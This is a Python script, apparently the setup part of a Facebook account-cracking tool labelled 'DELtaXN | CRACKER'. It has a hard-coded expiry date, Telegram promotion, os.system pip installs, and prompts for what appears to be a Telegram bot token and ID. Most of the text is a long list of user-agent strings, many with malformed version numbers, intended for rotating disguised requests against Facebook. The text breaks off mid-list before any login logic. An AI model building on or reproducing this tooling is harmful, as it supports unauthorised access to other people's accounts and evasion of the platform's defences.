import datetime;now = datetime.date.today();target = datetime.date(2024,9,10)
if now >=target:exit(" تم ايقاف الاداة ارسل للمطور امير السوري لل تفعيل  @A_6_60")
print(('\033[92m—'*60)+'\n               \33[0;41m[ امير السوري @A_6_60 ]   \033[0;92m\n'+('—'*60))
print(('\033[92m—'*60)+'\n         \33[0;44m[ شررحات امير السوري   @A_8_A_0 ]     \033[0;92m\n'+('—'*60))
import webbrowser
webbrowser.open('https://t.me/A_8_A_0')
import requests,bs4,json,os,sys,random,datetime,time,re
import urllib3,rich,base64
from rich.table import Table as me
from rich.console import Console as sol
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup as parser
from bs4 import BeautifulSoup as par
from concurrent.futures import ThreadPoolExecutor as tred
from rich.console import Group as gp
from rich.panel import Panel as panel
from rich.panel import Panel as nel
from rich.progress import track
from time import sleep
from rich import print as cetak
from concurrent.futures import ThreadPoolExecutor as DeltaXN 
from rich.panel import Panel
from rich.markdown import Markdown as mark
from rich.columns import Columns as col
from rich.tree import Tree
from rich import print as rprint
from rich import print as prints
from rich import pretty
from rich.console import Console as sol
from rich.progress import Progress,SpinnerColumn,BarColumn,TextColumn
from rich.text import Text as tekz
try:
	import requests
except ImportError:
	Z = '\033[1;31m' #احمر
R = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
F = '\033[2;32m' #اخضر
C = "\033[1;97m" #ابيض
B = '\033[2;36m'#سمائي
Y = '\033[1;34m' #ازرق فاتح.
E = '\033[1;31m'
B = '\033[2;36m'
G = '\033[1;32m'
S = '\033[1;33m'
ses = requests.Session()
F = '\033[2;32m'
Z = '\033[1;31m' 
L = "\033[1;95m"  #ارجواني
E = '\033[1;31m'
G = '\033[1;32m'
S = '\033[1;33m'
Z = '\033[1;31m' #احمر
X = '\033[1;33m' #اصفر
Z1 = '\033[2;31m' #احمر ثاني
F = '\033[2;32m' #اخضر
A = '\033[2;39m' #ازرق
C = '\033[2;35m' #وردي
B = '\033[2;36m'#سمائي
Y = '\033[1;34m' #ازرق فاتح
try:
 from cfonts import render, say
except:
 os.system('pip install python-cfonts')
output = render('A M I R ', colors=['green', 'red'], align='center')
print(output)
token=input(X+'[+]  TOKEN : '+F)
ID=input(X+'[+]  ID : '+F)
import webbrowser
webbrowser.open('https://t.me/A_8_A_0')
dump = []
memek = []
ualu,ualuh = [],[]
try:
        import rich
except ImportError:
        cetak(nel('\tSabar Puh Lagi Install Modul'))
        os.system('pip install rich')
try:
        import stdiomask
except ImportError:
        cetak(nel('\tSabar Puh Lagi Install Modul'))
        os.system('pip install stdiomask')
try:
	import requests
except ImportError:
	cetak(nel('\tSabar Puh Lagi Install Modul'))
	os.system('pip install requests && pip install mechanize ')
from rich.panel import Panel
from rich.tree import Tree
from rich import print as prints
from rich.console import Console
from rich.table import Table
from rich.columns import Columns
from rich.progress import Progress,SpinnerColumn,BarColumn,TextColumn,TimeElapsedColumn
console = Console()
sys.stdout.write('\x1b]2; DELtaXN | CRACKER\x07')
uas_random2 = random.choice(["Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36"])
uas_random2 = random.choice(["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"])
uas_random2 = random.choice(["Mozilla/5.0 (Linux; U; en-US) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.5+) Version/4.0 Kindle/3.0 (screen 600x800; rotate)"])
uas_random2 = random.choice(["Mozilla/5.0 (X11; U; Linux armv7l like Android; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/533.2+ Kindle/3.0+"])
uas_random2 = random.choice(["Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"])
import os
from rich.columns import Columns as col
from rich import pretty
from rich.text import Text as tekz
#--------------[ TEAM-SUPPORT ]-----------#
web_fb = "https://www.facebook.com/"
url_businness = "https://business.facebook.com"
ua_business = "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0)"
#------------------[ USER-AGENT ]-------------------#
pretty.install()
CON=sol()
ugen2=['Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_6_0 rv:3.0; HE) AppleWebKit/538..2 (KHTML like Gecko) Version/5..7 Safari/538..2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_9_3 rv:5.0; KA) AppleWebKit/537.2. (KHTML like Gecko) Version/6..2 Safari/537.2.', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/537.2. (KHTML like Gecko) Chrome/2.0.822.0 Safari/537.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/8.0.852.0 Safari/536.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/538.2. (KHTML like Gecko) Chrome/4.0.809.0 Safari/538.2.', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/7.0; .NET CLR 3.5.57.5)', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.2.2 (KHTML like Gecko) Chrome/7.0.872.0 Safari/534.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/538..2 (KHTML like Gecko) Chrome/2.0.850.0 Safari/538..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/532.0. (KHTML like Gecko) Chrome/26.0.868.0 Safari/532.0.', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/537.0.0 (KHTML like Gecko) Chrome/2.0.854.0 Safari/537.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/53.2.0 (KHTML like Gecko) Chrome/32.0.864.0 Safari/53.2.0', 'Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 5.2; Trident/7.0; .NET CLR 3.5.52208.4)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_6_6 rv:2.0; GA) AppleWebKit/537.0. (KHTML like Gecko) Version/7..5 Safari/537.0.', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_6_2 rv:2.0; VI) AppleWebKit/53.0.2 (KHTML like Gecko) Version/4.0.0 Safari/53.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/533.. (KHTML like Gecko) Chrome/8.0.868.0 Safari/533..', 'Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 5.2; Trident/5.0; .NET CLR .0.72779.)', 'Mozilla/5.0 (Windows NT 5.0; rv:0.8) Gecko/20000 Firefox/0.8.9', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/535.0. (KHTML like Gecko) Chrome/5.0.860.0 Safari/535.0.', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_7_8 rv:6.0; SL) AppleWebKit/533.2.2 (KHTML like Gecko) Version/6..4 Safari/533.2.2', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/5.; .NET CLR 2.3.62695.3)', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.0. (KHTML like Gecko) Chrome/39.0.843.0 Safari/534.0.', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/6.; .NET CLR 4.0.64379.7)', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/53..2 (KHTML like Gecko) Chrome/25.0.849.0 Safari/53..2', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533..0 (KHTML like Gecko) Chrome/28.0.83.0 Safari/533..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.2.2 (KHTML like Gecko) Chrome/25.0.820.0 Safari/536.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/53.2.0 (KHTML like Gecko) Chrome/34.0.854.0 Safari/53.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/534..0 (KHTML like Gecko) Chrome/3.0.852.0 Safari/534..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.2.2 (KHTML like Gecko) Chrome/6.0.892.0 Safari/536.2.2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0.8.6; rv:2.) Gecko/20000 Firefox/2..7', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/533.2. (KHTML like Gecko) Chrome/20.0.87.0 Safari/533.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/532.2.2 (KHTML like Gecko) Chrome/32.0.88.0 Safari/532.2.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_6_5 rv:4.0; MS) AppleWebKit/538.0.0 (KHTML like Gecko) Version/5..4 Safari/538.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/538.2.2 (KHTML like Gecko) Chrome/25.0.84.0 Safari/538.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/28.0.898.0 Safari/536.0.2', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Trident/7.0; .NET CLR ..2030.)', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/7.; .NET CLR 3.7.8556.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/535.0.0 (KHTML like Gecko) Chrome/30.0.896.0 Safari/535.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/53.0.2 (KHTML like Gecko) Chrome/2.0.836.0 Safari/53.0.2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_8_9)  AppleWebKit/535..0 (KHTML like Gecko) Chrome/6.0.83.0 Safari/535..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/534..0 (KHTML like Gecko) Chrome/36.0.85.0 Safari/534..0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/538.. (KHTML like Gecko) Chrome/29.0.809.0 Safari/538..', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/6.; .NET CLR .9.76807.8)', 'Mozilla/5.0 (Windows NT 6.2; rv:.) Gecko/20000 Firefox/..4', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/535.2.0 (KHTML like Gecko) Chrome/7.0.860.0 Safari/535.2.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:7.2) Gecko/20000 Firefox/7.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/537.0.2 (KHTML like Gecko) Chrome/2.0.84.0 Safari/537.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.2. (KHTML like Gecko) Chrome/24.0.870.0 Safari/533.2.', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0.5.3; rv:7.3) Gecko/20000 Firefox/7.3.7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_5_0 rv:2.0; DE) AppleWebKit/532..2 (KHTML like Gecko) Version/6..7 Safari/532..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/535..2 (KHTML like Gecko) Chrome/26.0.886.0 Safari/535..2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_0_3)  AppleWebKit/535.2. (KHTML like Gecko) Chrome/29.0.89.0 Safari/535.2.', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0.9.6; rv:3.2) Gecko/20000 Firefox/3.2.4', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/533..2 (KHTML like Gecko) Chrome/29.0.840.0 Safari/533..2', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.; Trident/7.0; .NET CLR 2.5.87879.4)', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.0.0 (KHTML like Gecko) Chrome/35.0.853.0 Safari/536.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/53.2.0 (KHTML like Gecko) Chrome/36.0.825.0 Safari/53.2.0', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/7.0; .NET CLR 3.2.49274.6)', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_7_0)  AppleWebKit/537.0. (KHTML like Gecko) Chrome/39.0.880.0 Safari/537.0.', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/3.0; .NET CLR 2.8.2069.9)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.0.2 (KHTML like Gecko) Chrome/8.0.860.0 Safari/534.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/532.0.0 (KHTML like Gecko) Chrome/32.0.832.0 Safari/532.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/535.2.2 (KHTML like Gecko) Chrome/27.0.870.0 Safari/535.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/532.2.0 (KHTML like Gecko) Chrome/25.0.869.0 Safari/532.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/53.. (KHTML like Gecko) Chrome/34.0.883.0 Safari/53..', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/7.0; .NET CLR 3.9.89763.)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.; Trident/6.; .NET CLR 3.3.28503.)', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534..0 (KHTML like Gecko) Chrome/34.0.806.0 Safari/534..0', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/533.0. (KHTML like Gecko) Chrome/22.0.86.0 Safari/533.0.', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; .NET CLR 4..698.2)', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/532.2. (KHTML like Gecko) Chrome/27.0.89.0 Safari/532.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/53..2 (KHTML like Gecko) Chrome/34.0.807.0 Safari/53..2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/533.0. (KHTML like Gecko) Chrome/2.0.806.0 Safari/533.0.', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/537..0 (KHTML like Gecko) Chrome/36.0.820.0 Safari/537..0', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/6.; .NET CLR 2.0.459.6)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR .8.58886.3)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.2.2 (KHTML like Gecko) Chrome/34.0.843.0 Safari/533.2.2', 'Mozilla/5.0 (Windows NT 5.; rv:.4) Gecko/20000 Firefox/.4.5', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_6_)  AppleWebKit/537.2. (KHTML like Gecko) Chrome/39.0.855.0 Safari/537.2.', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/532.2.0 (KHTML like Gecko) Chrome/37.0.867.0 Safari/532.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/532.2.0 (KHTML like Gecko) Chrome/3.0.88.0 Safari/532.2.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_8_5 rv:5.0; CA) AppleWebKit/534.2. (KHTML like Gecko) Version/6.0. Safari/534.2.', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 0_9_7 rv:6.0; NL) AppleWebKit/53.2.2 (KHTML like Gecko) Version/4.0.0 Safari/53.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535.0.2 (KHTML like Gecko) Chrome/6.0.870.0 Safari/535.0.2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_0_0)  AppleWebKit/536..0 (KHTML like Gecko) Chrome/38.0.850.0 Safari/536..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/537.. (KHTML like Gecko) Chrome/25.0.86.0 Safari/537..', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/538.0.2 (KHTML like Gecko) Chrome/32.0.858.0 Safari/538.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/532..0 (KHTML like Gecko) Chrome/34.0.882.0 Safari/532..0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_5_7)  AppleWebKit/538.. (KHTML like Gecko) Chrome/22.0.847.0 Safari/538..', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/3.0; .NET CLR 3.0.75947.8)', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.2.0 (KHTML like Gecko) Chrome/6.0.870.0 Safari/534.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/533.2. (KHTML like Gecko) Chrome/23.0.826.0 Safari/533.2.', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/53.2.0 (KHTML like Gecko) Chrome/25.0.89.0 Safari/53.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/7.0.839.0 Safari/536.0.2', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/3.; .NET CLR 3.9.62207.9)', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.2.0 (KHTML like Gecko) Chrome/30.0.866.0 Safari/534.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/535..0 (KHTML like Gecko) Chrome/27.0.805.0 Safari/535..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/535.. (KHTML like Gecko) Chrome/29.0.89.0 Safari/535..', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_7)  AppleWebKit/538.0.2 (KHTML like Gecko) Chrome/34.0.807.0 Safari/538.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/532.0.0 (KHTML like Gecko) Chrome/30.0.890.0 Safari/532.0.0', 'Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 5.0; Trident/6.0; .NET CLR 4..58569.4)', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/534.0. (KHTML like Gecko) Chrome/22.0.80.0 Safari/534.0.', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/537.. (KHTML like Gecko) Chrome/27.0.876.0 Safari/537..', 'Mozilla/5.0 (Windows NT 6.0; rv:0.2) Gecko/20000 Firefox/0.2.4', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/537.2. (KHTML like Gecko) Chrome/3.0.866.0 Safari/537.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/538.0.2 (KHTML like Gecko) Chrome/33.0.84.0 Safari/538.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/535.0.0 (KHTML like Gecko) Chrome/32.0.832.0 Safari/535.0.0', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.3; Trident/4.; .NET CLR .7.602.9)', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_5_5)  AppleWebKit/538.2.0 (KHTML like Gecko) Chrome/6.0.825.0 Safari/538.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/534.. (KHTML like Gecko) Chrome/7.0.802.0 Safari/534..', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/3.0; .NET CLR 3.7.3959.2)', 'Mozilla/5.0 (Windows NT 5.2; rv:2.7) Gecko/20000 Firefox/2.7.8', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0.5.9; rv:5.5) Gecko/20000 Firefox/5.5.9', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_9_0)  AppleWebKit/535.2. (KHTML like Gecko) Chrome/39.0.859.0 Safari/535.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/537..0 (KHTML like Gecko) Chrome/23.0.875.0 Safari/537..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/537.2.0 (KHTML like Gecko) Chrome/25.0.846.0 Safari/537.2.0', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0.5.8; rv:0.3) Gecko/20000 Firefox/0.3.8', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/35.0.82.0 Safari/536.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/538.. (KHTML like Gecko) Chrome/6.0.833.0 Safari/538..', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/6.; .NET CLR ..3880.5)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 3.0.25447.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/532..0 (KHTML like Gecko) Chrome/27.0.808.0 Safari/532..0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535..2 (KHTML like Gecko) Chrome/24.0.827.0 Safari/535..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/537..0 (KHTML like Gecko) Chrome/22.0.80.0 Safari/537..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.0. (KHTML like Gecko) Chrome/23.0.882.0 Safari/536.0.', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_8_6 rv:4.0; BG) AppleWebKit/53.0.2 (KHTML like Gecko) Version/7.0.8 Safari/53.0.2', 'Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 5.; Trident/6.0; .NET CLR 3.4.8005.6)', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_7_8 rv:2.0; IT) AppleWebKit/537..2 (KHTML like Gecko) Version/7..9 Safari/537..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/538.0.0 (KHTML like Gecko) Chrome/37.0.86.0 Safari/538.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/536.2.0 (KHTML like Gecko) Chrome/30.0.880.0 Safari/536.2.0', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_8_0 rv:3.0; EL) AppleWebKit/53.2. (KHTML like Gecko) Version/7.0.0 Safari/53.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/53.2. (KHTML like Gecko) Chrome/23.0.824.0 Safari/53.2.', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/535.0. (KHTML like Gecko) Chrome/23.0.883.0 Safari/535.0.', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_9_9)  AppleWebKit/536.0.2 (KHTML like Gecko) Chrome/27.0.840.0 Safari/536.0.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/535..2 (KHTML like Gecko) Chrome/22.0.867.0 Safari/535..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.2.0 (KHTML like Gecko) Chrome/24.0.89.0 Safari/535.2.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_9_2 rv:3.0; MT) AppleWebKit/532..2 (KHTML like Gecko) Version/5..0 Safari/532..2', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/533..2 (KHTML like Gecko) Chrome/3.0.833.0 Safari/533..2', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:5.7) Gecko/20000 Firefox/5.7.5', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/534.. (KHTML like Gecko) Chrome/34.0.850.0 Safari/534..', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0.7.9; rv:0.6) Gecko/20000 Firefox/0.6.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/534.0. (KHTML like Gecko) Chrome/27.0.875.0 Safari/534.0.', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.3; Trident/6.; .NET CLR 2.2.70.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/536.2.2 (KHTML like Gecko) Chrome/7.0.892.0 Safari/536.2.2', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_0_2 rv:4.0; IS) AppleWebKit/533..2 (KHTML like Gecko) Version/7..0 Safari/533..2', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/6.; .NET CLR 3..8370.4)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/534..0 (KHTML like Gecko) Chrome/35.0.882.0 Safari/534..0', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/537.0.0 (KHTML like Gecko) Chrome/28.0.858.0 Safari/537.0.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0.9.4; rv:6.2) Gecko/20000 Firefox/6.2.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0.0.4; rv:7.9) Gecko/20000 Firefox/7.9.9', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/53.2.2 (KHTML like Gecko) Chrome/5.0.880.0 Safari/53.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/534.. (KHTML like Gecko) Chrome/33.0.843.0 Safari/534..', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/533.2.0 (KHTML like Gecko) Chrome/23.0.858.0 Safari/533.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534..0 (KHTML like Gecko) Chrome/23.0.82.0 Safari/534..0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_8_0 rv:5.0; UZ) AppleWebKit/537.2.0 (KHTML like Gecko) Version/6.0.0 Safari/537.2.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_5_7)  AppleWebKit/538.0. (KHTML like Gecko) Chrome/7.0.858.0 Safari/538.0.', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/53.0.0 (KHTML like Gecko) Chrome/5.0.867.0 Safari/53.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/534.2.0 (KHTML like Gecko) Chrome/3.0.858.0 Safari/534.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/532.0.0 (KHTML like Gecko) Chrome/36.0.87.0 Safari/532.0.0', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.; .NET CLR 2.7.4744.)', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_9_4)  AppleWebKit/534.0. (KHTML like Gecko) Chrome/38.0.858.0 Safari/534.0.', 'Mozilla/5.0 (Windows; U; Windows NT 6.) AppleWebKit/532.0.2 (KHTML like Gecko) Chrome/8.0.853.0 Safari/532.0.2', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.3; Trident/3.0; .NET CLR 4.6.50560.9)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/534.0.0 (KHTML like Gecko) Chrome/20.0.876.0 Safari/534.0.0', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_9_2 rv:5.0; LT) AppleWebKit/534.0.2 (KHTML like Gecko) Version/6..3 Safari/534.0.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_8_3 rv:6.0; OC) AppleWebKit/532..0 (KHTML like Gecko) Version/6..8 Safari/532..0', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/5.0; .NET CLR 2.6.80488.9)', 'Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/532.2.0 (KHTML like Gecko) Chrome/35.0.829.0 Safari/532.2.0', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/6.; .NET CLR 3.3.055.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.; Trident/4.0; .NET CLR 4..99390.2)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/6.0; .NET CLR 2..5827.4)', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 0_7_9 rv:3.0; HT) AppleWebKit/536.0.0 (KHTML like Gecko) Version/5..5 Safari/536.0.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.2.2 (KHTML like Gecko) Chrome/35.0.835.0 Safari/534.2.2', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/535..0 (KHTML like Gecko) Chrome/7.0.835.0 Safari/535..0', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/537.2.2 (KHTML like Gecko) Chrome/30.0.89.0 Safari/537.2.2', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/4.; .NET CLR 4.0.6668.9)', 'Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/537.. (KHTML like Gecko) Chrome/26.0.862.0 Safari/537..', 'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; .NET CLR 4.3.44648.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.) AppleWebKit/535.0.2 (KHTML like Gecko) Chrome/38.0.895.0 Safari/535.0.2', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.; Trident/4.0; .NET CLR 3.8.22482.8)', 